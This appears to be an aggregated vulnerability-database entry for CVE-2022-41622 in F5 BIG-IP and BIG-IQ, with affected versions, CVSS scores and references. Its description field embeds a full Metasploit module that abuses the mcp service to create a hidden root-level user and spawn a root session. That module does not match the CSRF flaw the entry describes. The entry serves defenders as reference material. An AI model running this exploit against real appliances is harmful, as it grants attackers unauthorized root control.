ID

VAR-202211-1139


CVE

CVE-2022-41622


TITLE

Cross-site request forgery vulnerability in multiple F5 Networks products

Trust: 0.8

sources: JVNDB: JVNDB-2022-023336

DESCRIPTION

In all versions, BIG-IP and BIG-IQ are vulnerable to cross-site request forgery (CSRF) attacks through iControl SOAP. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated. Multiple F5 Networks products, including BIG-IQ Centralized Management, BIG-IP Advanced Firewall Manager (AFM), and BIG-IP Analytics, contain a cross-site request forgery vulnerability. Information may be obtained, information may be tampered with, and service operation may be interrupted (DoS). An attacker may trick users who have at least resource administrator role privilege and are authenticated through basic authentication in iControl SOAP into performing critical actions. An attacker can exploit this vulnerability only through the control plane, not through the data plane. If exploited, the vulnerability can compromise the complete system.

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'unix_crypt'

class MetasploitModule < Msf::Exploit::Local
  include Msf::Post::Linux::F5Mcp
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'F5 Big-IP Create Admin User',
        'Description' => %q{
          This creates a local user with a username/password and root-level privileges.
          Note that a root-level account is not required to do this, which makes it a
          privilege escalation issue.

          Note that this is pretty noisy, since it creates a user account and creates
          log files and such. Additionally, most (if not all) vulnerabilities in F5 grant
          root access anyways.

          Adapted from https://github.com/rbowes-r7/refreshing-mcp-tool/blob/main/mcp-privesc.rb
        },
        'License' => MSF_LICENSE,
        'Author' => ['Ron Bowes'],
        'Platform' => [ 'unix', 'linux', 'python' ],
        'SessionTypes' => ['shell', 'meterpreter'],
        'References' => [
          ['URL', 'https://github.com/rbowes-r7/refreshing-mcp-tool'], # Original PoC
          ['URL', 'https://www.rapid7.com/blog/post/2022/11/16/cve-2022-41622-and-cve-2022-41800-fixed-f5-big-ip-and-icontrol-rest-vulnerabilities-and-exposures/'],
          ['URL', 'https://support.f5.com/csp/article/K97843387'],
        ],
        'Privileged' => true,
        'DisclosureDate' => '2022-11-16',
        'Arch' => [ ARCH_CMD, ARCH_PYTHON ],
        'Type' => :unix_cmd,
        'Targets' => [[ 'Auto', {} ]],
        'Notes' => {
          'Stability' => [],
          'Reliability' => [],
          'SideEffects' => []
        }
      )
    )

    register_options([
      OptString.new('USERNAME', [true, 'Username to create (default: random)', Rex::Text.rand_text_alphanumeric(8)]),
      OptString.new('PASSWORD', [true, 'Password for the new user (default: random)', Rex::Text.rand_text_alphanumeric(12)]),
      OptBool.new('CREATE_SESSION', [true, 'If set, use the new account to create a root session', true]),
    ])
  end

  def exploit
    # Get or generate the username/password
    fail_with(Failure::BadConfig, 'USERNAME cannot be empty') if datastore['USERNAME'].empty?
    username = datastore['USERNAME']

    if datastore['CREATE_SESSION']
      password = Rex::Text.rand_text_alphanumeric(12)
      new_password = datastore['PASSWORD'] || Rex::Text.rand_text_alphanumeric(12)
      print_status("Will attempt to create user #{username} / #{password}, then change password to #{new_password} when creating a session")
    else
      password = datastore['PASSWORD'] || Rex::Text.rand_text_alphanumeric(12)
      print_status("Will attempt to create user #{username} / #{password}")
    end

    # If the password is already hashed, leave it as-is
    vprint_status('Hashing the password with SHA512')
    hashed_password = UnixCrypt::SHA512.build(password)
    if !hashed_password || hashed_password.empty?
      fail_with(Failure::BadConfig, 'Failed to hash the password with String.crypt')
    end

    # These requests have to go in a single 'session', which, to us, is
    # a single packet (since we don't have AF_UNIX sockets)
    result = mcp_send_recv([
      # Authenticate as 'admin' (this probably shouldn't work but does)
      mcp_build('user_authenticated', 'structure', [
        mcp_build('user_authenticated_name', 'string', 'admin')
      ]),

      # Start transaction
      mcp_build('start_transaction', 'structure', [
        mcp_build('start_transaction_load_type', 'ulong', 0)
      ]),

      # Create the role mapping
      mcp_build('create', 'structure', [
        mcp_build('user_role_partition', 'structure', [
          mcp_build('user_role_partition_user', 'string', username),
          mcp_build('user_role_partition_role', 'ulong', 0),
          mcp_build('user_role_partition_partition', 'string', '[All]'),
        ])
      ]),

      # Create the userdb entry
      mcp_build('create', 'structure', [
        mcp_build('userdb_entry', 'structure', [
          mcp_build('userdb_entry_name', 'string', username),
          mcp_build('userdb_entry_partition_id', 'string', 'Common'),
          mcp_build('userdb_entry_is_system', 'ulong', 0),
          mcp_build('userdb_entry_shell', 'string', '/bin/bash'),
          mcp_build('userdb_entry_is_crypted', 'ulong', 1),
          mcp_build('userdb_entry_passwd', 'string', hashed_password),
        ])
      ]),

      # Finish the transaction
      mcp_build('end_transaction', 'structure', [])
    ])

    # Handle errors
    if result.nil?
      fail_with(Failure::Unknown, 'Request to mcp appeared to fail')
    end

    # The only result we really care about is an error
    error_returned = false
    result.each do |r|
      result = mcp_get_single(r, 'result')
      result_code = mcp_get_single(result, 'result_code')

      # If there's no code or it's zero, just ignore it
      if result_code.nil? || result_code == 0
        next
      end

      # If we're here, an error was returned!
      error_returned = true

      # Otherwise, try and get result_message
      result_message = mcp_get_single(result, 'result_message')
      if result_message.nil?
        print_warning("mcp query returned a non-zero result (#{result_code}), but no error message")
      else
        print_error("mcp query returned an error message: #{result_message} (code: #{result_code})")
      end
    end

    # Let them know if it likely worked
    if !error_returned
      print_good("Service didn't return an error, so user was likely created!")

      if datastore['CREATE_SESSION']
        print_status('Attempting create a root session...')
        out = cmd_exec("echo -ne \"#{password}\\n#{password}\\n#{new_password}\\n#{new_password}\\n#{payload.encoded}\\n\" | su #{username}")
        vprint_status("Output from su command: #{out}")
      end
    end
  end
end

Trust: 1.89

sources: NVD: CVE-2022-41622 // JVNDB: JVNDB-2022-023336 // VULHUB: VHN-437877 // VULMON: CVE-2022-41622 // PACKETSTORM: 170847

AFFECTED PRODUCTS

vendor: f5 / model: big-ip analytics / scope: gte / version: 15.1.0

Trust: 1.0

vendor: f5 / model: big-ip application security manager / scope: lte / version: 14.1.5

Trust: 1.0

vendor: f5 / model: big-ip local traffic manager / scope: gte / version: 14.1.0

Trust: 1.0

vendor: f5 / model: big-ip link controller / scope: eq / version: 17.0.0

Trust: 1.0

vendor: f5 / model: big-ip policy enforcement manager / scope: gte / version: 16.1.0

Trust: 1.0

vendor: f5 / model: big-ip policy enforcement manager / scope: eq / version: 17.0.0

Trust: 1.0

vendor: f5 / model: big-ip advanced firewall manager / scope: gte / version: 15.1.0

Trust: 1.0

vendor: f5 / model: big-ip analytics / scope: gte / version: 14.1.0

Trust: 1.0

vendor: f5 / model: big-ip global traffic manager / scope: lte / version: 16.1.3

Trust: 1.0

vendor: f5 / model: big-ip application security manager / scope: lte / version: 15.1.8

Trust: 1.0

vendor: f5 / model: big-ip application security manager / scope: gte / version: 15.1.0

Trust: 1.0

vendor: f5 / model: big-ip link controller / scope: gte / version: 16.1.0

Trust: 1.0

vendor: f5 / model: big-ip link controller / scope: lte / version: 16.1.3

Trust: 1.0

vendor: f5 / model: big-ip advanced firewall manager / scope: gte / version: 14.1.0

Trust: 1.0

vendor: f5 / model: big-ip policy enforcement manager / scope: lte / version: 13.1.5

Trust: 1.0

vendor: f5 / model: big-ip policy enforcement manager / scope: lte / version: 14.1.5

Trust: 1.0

vendor: f5 / model: big-ip analytics / scope: eq / version: 17.0.0

Trust: 1.0

vendor: f5 / model: big-ip access policy manager / scope: gte / version: 16.1.0

Trust: 1.0

vendor: f5 / model: big-ip local traffic manager / scope: eq / version: 17.0.0

Trust: 1.0

vendor: f5 / model: big-ip access policy manager / scope: lte / version: 16.1.3

Trust: 1.0

vendor: f5 / model: big-ip fraud protection service / scope: gte / version: 13.1.0

Trust: 1.0

vendor: f5 / model: big-ip analytics / scope: gte / version: 13.1.0

Trust: 1.0

vendor: f5 / model: big-ip policy enforcement manager / scope: lte / version: 15.1.8

Trust: 1.0

vendor: f5 / model: big-ip policy enforcement manager / scope: gte / version: 15.1.0

Trust: 1.0

vendor: f5 / model: big-ip global traffic manager / scope: gte / version: 15.1.0

Trust: 1.0

vendor: f5 / model: big-ip analytics / scope: lte / version: 13.1.5

Trust: 1.0

vendor: f5 / model: big-ip domain name system / scope: gte / version: 16.1.0

Trust: 1.0

vendor: f5 / model: big-ip access policy manager / scope: lte / version: 14.1.5

Trust: 1.0

vendor: f5 / model: big-ip advanced firewall manager / scope: gte / version: 13.1.0

Trust: 1.0

vendor: f5 / model: big-ip local traffic manager / scope: lte / version: 13.1.5

Trust: 1.0

vendor: f5 / model: big-ip fraud protection service / scope: gte / version: 16.1.0

Trust: 1.0

vendor: f5 / model: big-ip fraud protection service / scope: eq / version: 17.0.0

Trust: 1.0

vendor: f5 / model: big-ip local traffic manager / scope: lte / version: 14.1.5

Trust: 1.0

vendor: f5 / model: big-ip local traffic manager / scope: gte / version: 16.1.0

Trust: 1.0

vendor: f5 / model: big-ip advanced firewall manager / scope: lte / version: 13.1.5

Trust: 1.0

vendor: f5 / model: big-ip policy enforcement manager / scope: gte / version: 14.1.0

Trust: 1.0

vendor: f5 / model: big-ip advanced firewall manager / scope: lte / version: 14.1.5

Trust: 1.0

vendor: f5 / model: big-ip link controller / scope: gte / version: 15.1.0

Trust: 1.0

vendor: f5 / model: big-ip application security manager / scope: gte / version: 13.1.0

Trust: 1.0

vendor: f5 / model: big-ip access policy manager / scope: lte / version: 15.1.8

Trust: 1.0

vendor: f5 / model: big-ip access policy manager / scope: gte / version: 15.1.0

Trust: 1.0

vendor: f5 / model: big-ip domain name system / scope: lte / version: 13.1.5

Trust: 1.0

vendor: f5 / model: big-ip domain name system / scope: lte / version: 14.1.5

Trust: 1.0

vendor: f5 / model: big-ip local traffic manager / scope: lte / version: 15.1.8

Trust: 1.0

vendor: f5 / model: big-ip fraud protection service / scope: lte / version: 13.1.5

Trust: 1.0

vendor: f5 / model: big-ip link controller / scope: gte / version: 14.1.0

Trust: 1.0

vendor: f5 / model: big-ip application acceleration manager / scope: gte / version: 16.1.0

Trust: 1.0

vendor: f5 / model: big-ip fraud protection service / scope: lte / version: 14.1.5

Trust: 1.0

vendor: f5 / model: big-ip advanced firewall manager / scope: lte / version: 15.1.8

Trust: 1.0

vendor: f5 / model: big-ip domain name system / scope: lte / version: 15.1.8

Trust: 1.0

vendor: f5 / model: big-ip domain name system / scope: gte / version: 15.1.0

Trust: 1.0

vendor: f5 / model: big-ip global traffic manager / scope: gte / version: 13.1.0

Trust: 1.0

vendor: f5 / model: big-ip policy enforcement manager / scope: gte / version: 13.1.0

Trust: 1.0

vendor: f5 / model: big-ip fraud protection service / scope: lte / version: 15.1.8

Trust: 1.0

vendor: f5 / model: big-ip fraud protection service / scope: gte / version: 15.1.0

Trust: 1.0

vendor: f5 / model: big-ip application security manager / scope: lte / version: 13.1.5

Trust: 1.0

vendor: f5 / model: big-ip local traffic manager / scope: gte / version: 15.1.0

Trust: 1.0

vendor: f5 / model: big-ip application acceleration manager / scope: lte / version: 13.1.5

Trust: 1.0

vendor: f5 / model: big-ip application acceleration manager / scope: lte / version: 14.1.5

Trust: 1.0

vendor: f5 / model: big-ip domain name system / scope: gte / version: 14.1.0

Trust: 1.0

vendor: f5 / model: big-ip global traffic manager / scope: gte / version: 16.1.0

Trust: 1.0

vendor: f5 / model: big-ip global traffic manager / scope: eq / version: 17.0.0

Trust: 1.0

vendor: f5 / model: big-ip link controller / scope: gte / version: 13.1.0

Trust: 1.0

vendor: f5 / model: big-ip application acceleration manager / scope: lte / version: 16.1.3

Trust: 1.0

vendor: f5 / model: big-iq centralized management / scope: eq / version: 7.1.0

Trust: 1.0

vendor: f5 / model: big-iq centralized management / scope: gte / version: 8.0.0

Trust: 1.0

vendor: f5 / model: big-ip fraud protection service / scope: gte / version: 14.1.0

Trust: 1.0

vendor: f5 / model: big-ip access policy manager / scope: gte / version: 13.1.0

Trust: 1.0

vendor: f5 / model: big-ip application acceleration manager / scope: lte / version: 15.1.8

Trust: 1.0

vendor: f5 / model: big-ip application acceleration manager / scope: gte / version: 15.1.0

Trust: 1.0

vendor: f5 / model: big-ip policy enforcement manager / scope: lte / version: 16.1.3

Trust: 1.0

vendor: f5 / model: big-ip global traffic manager / scope: lte / version: 13.1.5

Trust: 1.0

vendor: f5 / model: big-ip global traffic manager / scope: lte / version: 14.1.5

Trust: 1.0

vendor: f5 / model: big-ip access policy manager / scope: eq / version: 17.0.0

Trust: 1.0

vendor: f5 / model: big-ip application security manager / scope: gte / version: 14.1.0

Trust: 1.0

vendor: f5 / model: big-ip link controller / scope: lte / version: 13.1.5

Trust: 1.0

vendor: f5 / model: big-ip application acceleration manager / scope: gte / version: 14.1.0

Trust: 1.0

vendor: f5 / model: big-iq centralized management / scope: lte / version: 8.2.0

Trust: 1.0

vendor: f5 / model: big-ip domain name system / scope: gte / version: 13.1.0

Trust: 1.0

vendor: f5 / model: big-ip link controller / scope: lte / version: 14.1.5

Trust: 1.0

vendor: f5 / model: big-ip local traffic manager / scope: gte / version: 13.1.0

Trust: 1.0

vendor: f5 / model: big-ip global traffic manager / scope: lte / version: 15.1.8

Trust: 1.0

vendor: f5 / model: big-ip analytics / scope: lte / version: 16.1.3

Trust: 1.0

vendor: f5 / model: big-ip access policy manager / scope: lte / version: 13.1.5

Trust: 1.0

vendor: f5 / model: big-ip domain name system / scope: eq / version: 17.0.0

Trust: 1.0

vendor: f5 / model: big-ip link controller / scope: lte / version: 15.1.8

Trust: 1.0

vendor: f5 / model: big-ip local traffic manager / scope: lte / version: 16.1.3

Trust: 1.0

vendor: f5 / model: big-ip advanced firewall manager / scope: lte / version: 16.1.3

Trust: 1.0

vendor: f5 / model: big-ip advanced firewall manager / scope: eq / version: 17.0.0

Trust: 1.0

vendor: f5 / model: big-ip global traffic manager / scope: gte / version: 14.1.0

Trust: 1.0

vendor: f5 / model: big-ip analytics / scope: lte / version: 14.1.5

Trust: 1.0

vendor: f5 / model: big-ip application acceleration manager / scope: gte / version: 13.1.0

Trust: 1.0

vendor: f5 / model: big-ip analytics / scope: gte / version: 16.1.0

Trust: 1.0

vendor: f5 / model: big-ip application security manager / scope: eq / version: 17.0.0

Trust: 1.0

vendor: f5 / model: big-ip domain name system / scope: lte / version: 16.1.3

Trust: 1.0

vendor: f5 / model: big-ip fraud protection service / scope: lte / version: 16.1.3

Trust: 1.0

vendor: f5 / model: big-ip application acceleration manager / scope: eq / version: 17.0.0

Trust: 1.0

vendor: f5 / model: big-ip analytics / scope: lte / version: 15.1.8

Trust: 1.0

vendor: f5 / model: big-ip advanced firewall manager / scope: gte / version: 16.1.0

Trust: 1.0

vendor: f5 / model: big-ip access policy manager / scope: gte / version: 14.1.0

Trust: 1.0

vendor: f5 / model: big-ip application security manager / scope: gte / version: 16.1.0

Trust: 1.0

vendor: f5 / model: big-ip application security manager / scope: lte / version: 16.1.3

Trust: 1.0

vendor: f5 / model: big-ip link controller / scope: - / version: -

Trust: 0.8

vendor: f5 / model: big-ip advanced firewall manager / scope: - / version: -

Trust: 0.8

vendor: f5 / model: big-ip global traffic manager / scope: - / version: -

Trust: 0.8

vendor: f5 / model: big-ip local traffic manager / scope: - / version: -

Trust: 0.8

vendor: f5 / model: big-iq centralized management / scope: - / version: -

Trust: 0.8

vendor: f5 / model: big-ip access policy manager / scope: - / version: -

Trust: 0.8

vendor: f5 / model: big-ip application security manager / scope: - / version: -

Trust: 0.8

vendor: f5 / model: big-ip analytics / scope: - / version: -

Trust: 0.8

vendor: f5 / model: big-ip domain name system / scope: - / version: -

Trust: 0.8

vendor: f5 / model: big-ip fraud protection service / scope: - / version: -

Trust: 0.8

sources: JVNDB: JVNDB-2022-023336 // NVD: CVE-2022-41622

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2022-41622
value: HIGH

Trust: 1.0

f5sirt@f5.com: CVE-2022-41622
value: HIGH

Trust: 1.0

NVD: CVE-2022-41622
value: HIGH

Trust: 0.8

CNNVD: CNNVD-202211-2929
value: HIGH

Trust: 0.6

nvd@nist.gov: CVE-2022-41622
baseSeverity: HIGH
baseScore: 8.8
vectorString: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
attackVector: NETWORK
attackComplexity: LOW
privilegesRequired: NONE
userInteraction: REQUIRED
scope: UNCHANGED
confidentialityImpact: HIGH
integrityImpact: HIGH
availabilityImpact: HIGH
exploitabilityScore: 2.8
impactScore: 5.9
version: 3.1

Trust: 2.0

NVD: CVE-2022-41622
baseSeverity: HIGH
baseScore: 8.8
vectorString: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
attackVector: NETWORK
attackComplexity: LOW
privilegesRequired: NONE
userInteraction: REQUIRED
scope: UNCHANGED
confidentialityImpact: HIGH
integrityImpact: HIGH
availabilityImpact: HIGH
exploitabilityScore: NONE
impactScore: NONE
version: 3.0

Trust: 0.8

sources: JVNDB: JVNDB-2022-023336 // CNNVD: CNNVD-202211-2929 // NVD: CVE-2022-41622 // NVD: CVE-2022-41622

PROBLEMTYPE DATA

problemtype:CWE-352

Trust: 1.1

problemtype: Cross-site request forgery (CWE-352) [NVD evaluation]

Trust: 0.8

sources: VULHUB: VHN-437877 // JVNDB: JVNDB-2022-023336 // NVD: CVE-2022-41622

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-202211-2929

TYPE

cross-site request forgery

Trust: 0.6

sources: CNNVD: CNNVD-202211-2929

EXPLOIT AVAILABILITY

sources: VULHUB: VHN-437877

PATCH

title: K94221585 / url: https://my.f5.com/manage/s/article/K94221585

Trust: 0.8

sources: JVNDB: JVNDB-2022-023336

EXTERNAL IDS

db: NVD / id: CVE-2022-41622

Trust: 3.5

db: PACKETSTORM / id: 170847

Trust: 0.8

db: JVNDB / id: JVNDB-2022-023336

Trust: 0.8

db: PACKETSTORM / id: 169967

Trust: 0.7

db: AUSCERT / id: ESB-2022.5996

Trust: 0.6

db: CNNVD / id: CNNVD-202211-2929

Trust: 0.6

db: VULHUB / id: VHN-437877

Trust: 0.1

db: VULMON / id: CVE-2022-41622

Trust: 0.1

sources: VULHUB: VHN-437877 // VULMON: CVE-2022-41622 // JVNDB: JVNDB-2022-023336 // PACKETSTORM: 170847 // CNNVD: CNNVD-202211-2929 // NVD: CVE-2022-41622

REFERENCES

url:https://support.f5.com/csp/article/k94221585

Trust: 1.8

url:https://nvd.nist.gov/vuln/detail/cve-2022-41622

Trust: 0.9

url:https://packetstormsecurity.com/files/169967/f5-big-ip-icontrol-cross-site-request-forgery.html

Trust: 0.7

url:https://packetstormsecurity.com/files/170847/f5-big-ip-create-administrative-user.html

Trust: 0.6

url:https://cxsecurity.com/cveshow/cve-2022-41622/

Trust: 0.6

url:https://vigilance.fr/vulnerability/f5-big-ip-cross-site-request-forgery-via-icontrol-soap-39927

Trust: 0.6

url:https://www.auscert.org.au/bulletins/esb-2022.5996

Trust: 0.6

url:https://www.rapid7.com/blog/post/2022/11/16/cve-2022-41622-and-cve-2022-41800-fixed-f5-big-ip-and-icontrol-rest-vulnerabilities-and-exposures/

Trust: 0.1

url:https://github.com/rbowes-r7/refreshing-mcp-tool/blob/main/mcp-privesc.rb

Trust: 0.1

url:https://github.com/rapid7/metasploit-framework

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2022-41800

Trust: 0.1

url:https://support.f5.com/csp/article/k97843387

Trust: 0.1

url:https://metasploit.com/download

Trust: 0.1

url:https://github.com/rbowes-r7/refreshing-mcp-tool

Trust: 0.1

sources: VULHUB: VHN-437877 // VULMON: CVE-2022-41622 // JVNDB: JVNDB-2022-023336 // PACKETSTORM: 170847 // CNNVD: CNNVD-202211-2929 // NVD: CVE-2022-41622

CREDITS

Ron Bowes

Trust: 0.1

sources: PACKETSTORM: 170847

SOURCES

db: VULHUB / id: VHN-437877
db: VULMON / id: CVE-2022-41622
db: JVNDB / id: JVNDB-2022-023336
db: PACKETSTORM / id: 170847
db: CNNVD / id: CNNVD-202211-2929
db: NVD / id: CVE-2022-41622

LAST UPDATE DATE

2024-08-14T15:11:12.119000+00:00


SOURCES UPDATE DATE

db: VULHUB / id: VHN-437877 / date: 2022-12-08T00:00:00
db: JVNDB / id: JVNDB-2022-023336 / date: 2023-11-28T06:00:00
db: CNNVD / id: CNNVD-202211-2929 / date: 2023-02-06T00:00:00
db: NVD / id: CVE-2022-41622 / date: 2023-11-07T03:52:51.043

SOURCES RELEASE DATE

db: VULHUB / id: VHN-437877 / date: 2022-12-07T00:00:00
db: JVNDB / id: JVNDB-2022-023336 / date: 2023-11-28T00:00:00
db: PACKETSTORM / id: 170847 / date: 2023-02-03T14:49:22
db: CNNVD / id: CNNVD-202211-2929 / date: 2022-11-16T00:00:00
db: NVD / id: CVE-2022-41622 / date: 2022-12-07T04:15:10.333